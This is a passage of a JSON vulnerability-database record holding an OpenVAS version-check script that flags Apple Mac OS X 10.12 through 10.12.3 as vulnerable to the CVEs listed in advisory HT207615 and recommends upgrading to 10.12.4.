"CVE-2017-2483", "CVE-2016-7986", "CVE-2017-2456", "CVE-2017-2485", "CVE-2017-2443", "CVE-2017-2418", "CVE-2017-2381", "CVE-2017-2489", "CVE-2016-9539", "CVE-2016-7935", "CVE-2017-2451", "CVE-2017-5205", "CVE-2017-2406", "CVE-2016-7934", "CVE-2016-4688", "CVE-2016-9535", "CVE-2017-5486", "CVE-2017-2474", "CVE-2016-5636", "CVE-2017-2472", "CVE-2017-2390", "CVE-2017-2417", "CVE-2016-7975", "CVE-2016-7937", "CVE-2016-8575", "CVE-2016-7585", "CVE-2017-2388", "CVE-2017-7070", "CVE-2016-9537", "CVE-2016-8574", "CVE-2016-9538", "CVE-2017-2462", "CVE-2017-2487", "CVE-2016-10160", "CVE-2017-5204", "CVE-2016-7926", "CVE-2016-7939", "CVE-2016-7924", "CVE-2017-2449", "CVE-2017-6974", "CVE-2017-2421", "CVE-2017-2427", "CVE-2016-7974", "CVE-2017-5029", "CVE-2017-2410", "CVE-2017-2482", "CVE-2017-2477", "CVE-2016-10159", "CVE-2017-2458", "CVE-2016-7992", "CVE-2017-2448", "CVE-2016-10012", "CVE-2017-2401", "CVE-2017-2409", "CVE-2016-7932", "CVE-2016-8740", "CVE-2017-2392", "CVE-2017-2413", "CVE-2017-2408", "CVE-2017-5202", "CVE-2017-2467", "CVE-2016-5387", "CVE-2016-7938", "CVE-2016-7984", "CVE-2017-2490", "CVE-2017-5483", "CVE-2016-9586", "CVE-2017-2407", "CVE-2017-2438", "CVE-2016-7973", "CVE-2017-2426", "CVE-2017-2436", "CVE-2017-2473", "CVE-2016-10161", "CVE-2017-2403", "CVE-2017-2416", "CVE-2017-5482", "CVE-2017-2457", "CVE-2016-7929", "CVE-2016-7940", "CVE-2016-7923", "CVE-2016-7925", "CVE-2016-9533", "CVE-2017-2398", "CVE-2017-2440", "CVE-2016-10158", "CVE-2016-7927", "CVE-2016-0736", "CVE-2017-5485", "CVE-2017-2425", "CVE-2017-2429", "CVE-2017-2432", "CVE-2016-7933", "CVE-2017-2478"], "modified": "2019-09-20T00:00:00", "id": "OPENVAS:1361412562310810728", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310810728", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Apple Mac OS X Multiple Vulnerabilities-HT207615\n#\n# Authors:\n# Antu Sanadi <santu@secpod.com>\n#\n# Copyright:\n# Copyright (C) 2017 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.810728\");\n script_version(\"2019-09-20T11:01:01+0000\");\n script_cve_id(\"CVE-2016-0736\", \"CVE-2016-2161\", \"CVE-2016-5387\", \"CVE-2016-8740\",\n \"CVE-2016-8743\", \"CVE-2016-10158\", \"CVE-2016-10159\", \"CVE-2016-10160\",\n \"CVE-2016-10161\", \"CVE-2016-9935\", \"CVE-2017-2421\", \"CVE-2017-2438\",\n \"CVE-2017-2430\", \"CVE-2017-2462\", \"CVE-2017-2420\", \"CVE-2017-2427\",\n \"CVE-2017-2449\", \"CVE-2017-2379\", \"CVE-2017-2417\", \"CVE-2017-2431\",\n \"CVE-2017-2435\", \"CVE-2017-2450\", \"CVE-2017-2461\", \"CVE-2016-9586\",\n \"CVE-2016-7585\", \"CVE-2017-2429\", \"CVE-2017-2487\", \"CVE-2017-2406\",\n \"CVE-2017-2407\", \"CVE-2017-2439\", \"CVE-2017-2428\", \"CVE-2017-2418\",\n \"CVE-2017-2426\", \"CVE-2017-2416\", \"CVE-2017-2467\", \"CVE-2017-2489\",\n \"CVE-2016-3619\", \"CVE-2017-2443\", \"CVE-2017-2408\", \"CVE-2017-2436\",\n \"CVE-2017-2437\", \"CVE-2017-2388\", \"CVE-2017-2398\", \"CVE-2017-2401\",\n \"CVE-2017-2410\", \"CVE-2017-2440\", \"CVE-2017-2456\", \"CVE-2017-2472\",\n \"CVE-2017-2473\", \"CVE-2017-2474\", \"CVE-2017-2478\", \"CVE-2017-2482\",\n \"CVE-2017-2483\", \"CVE-2017-2458\", \"CVE-2017-2448\", \"CVE-2017-2390\",\n \"CVE-2017-2441\", \"CVE-2017-2402\", \"CVE-2017-2392\", \"CVE-2017-2457\",\n \"CVE-2017-2409\", \"CVE-2017-2422\", \"CVE-2016-10009\", \"CVE-2016-10010\",\n \"CVE-2016-10011\", \"CVE-2016-10012\", \"CVE-2016-7056\", \"CVE-2017-2403\",\n \"CVE-2016-5636\", \"CVE-2017-2413\", \"CVE-2017-2423\", \"CVE-2017-2451\",\n \"CVE-2017-2485\", \"CVE-2017-2425\", \"CVE-2017-2381\", \"CVE-2017-6974\",\n \"CVE-2016-7922\", \"CVE-2016-7923\", \"CVE-2016-7924\", \"CVE-2016-7925\",\n \"CVE-2016-7926\", \"CVE-2016-7927\", \"CVE-2016-7928\", \"CVE-2016-7929\",\n \"CVE-2016-7930\", \"CVE-2016-7931\", \"CVE-2016-7932\", \"CVE-2016-7933\",\n \"CVE-2016-7934\", \"CVE-2016-7935\", \"CVE-2016-7936\", \"CVE-2016-7937\",\n \"CVE-2016-7938\", \"CVE-2016-7939\", \"CVE-2016-7940\", \"CVE-2016-7973\",\n \"CVE-2016-7974\", \"CVE-2016-7975\", \"CVE-2016-7983\", \"CVE-2016-7984\",\n \"CVE-2016-7985\", \"CVE-2016-7986\", \"CVE-2016-7992\", \"CVE-2016-7993\",\n \"CVE-2016-8574\", \"CVE-2016-8575\", \"CVE-2017-5202\", \"CVE-2017-5203\",\n \"CVE-2017-5204\", \"CVE-2017-5205\", \"CVE-2017-5341\", \"CVE-2017-5342\",\n \"CVE-2017-5482\", \"CVE-2017-5483\", \"CVE-2017-5484\", \"CVE-2017-5485\",\n \"CVE-2017-5486\", \"CVE-2016-9533\", \"CVE-2016-9535\",\n \"CVE-2016-9536\", \"CVE-2016-9537\", \"CVE-2016-9538\", \"CVE-2016-9539\",\n \"CVE-2016-9540\", \"CVE-2017-2486\", \"CVE-2016-4688\", \"CVE-2017-2432\",\n \"CVE-2017-2490\", \"CVE-2017-7070\", \"CVE-2017-2477\", \"CVE-2017-5029\");\n script_bugtraq_id(95078, 95076, 91816, 94650, 95077, 95764, 95774, 95783, 95768,\n 94846, 97140, 97137, 95019, 97146, 85919, 97147, 97134, 95375,\n 96767, 94968, 94972, 94977, 94975, 91247, 97132, 95852, 94742,\n 94744, 94745, 94746, 94753, 94754, 94747, 97300, 97303);\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"last_modification\", value:\"2019-09-20 11:01:01 +0000 (Fri, 20 Sep 2019)\");\n script_tag(name:\"creation_date\", value:\"2017-03-31 17:37:14 +0530 (Fri, 31 Mar 2017)\");\n script_name(\"Apple Mac OS X Multiple Vulnerabilities-HT207615\");\n\n script_tag(name:\"summary\", value:\"This host is running Apple Mac OS X and\n is prone to multiple vulnerabilities.\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n\n script_tag(name:\"insight\", value:\"Multiple flaws exists. For details\n refer the reference links.\");\n\n script_tag(name:\"impact\", value:\"Successful exploitation will allow attacker\n to execute arbitrary code or cause a denial of service (memory corruption),\n gain access to potentially sensitive information, bypass certain protection\n mechanism and have other impacts.\");\n\n script_tag(name:\"affected\", value:\"Apple Mac OS X version 10.12.x through\n 10.12.3\");\n\n script_tag(name:\"solution\", value:\"Upgrade to Apple Mac OS X version\n 10.12.4 or later.\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_xref(name:\"URL\", value:\"https://support.apple.com/en-us/HT207615\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2017 Greenbone Networks GmbH\");\n script_family(\"Mac OS X Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/osx_name\", \"ssh/login/osx_version\", re:\"ssh/login/osx_version=^10\\.12\");\n exit(0);\n}\n\ninclude(\"version_func.inc\");\n\nosName = get_kb_item(\"ssh/login/osx_name\");\nif(!osName)\n exit(0);\n\nosVer = get_kb_item(\"ssh/login/osx_version\");\nif(!osVer){\n exit(0);\n}\n\nif(\"Mac OS X\" >< osName)\n{\n if(version_in_range(version:osVer, test_version:\"10.12\", test_version2:\"10.12.3\"))\n {\n report = report_fixed_ver(installed_version:osVer, fixed_version:\"10.12.4\");\n security_message(data:report);\n exit(0);\n }\n exit(99);\n}\n\nexit(0);\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}]}
CVE-2017-2478
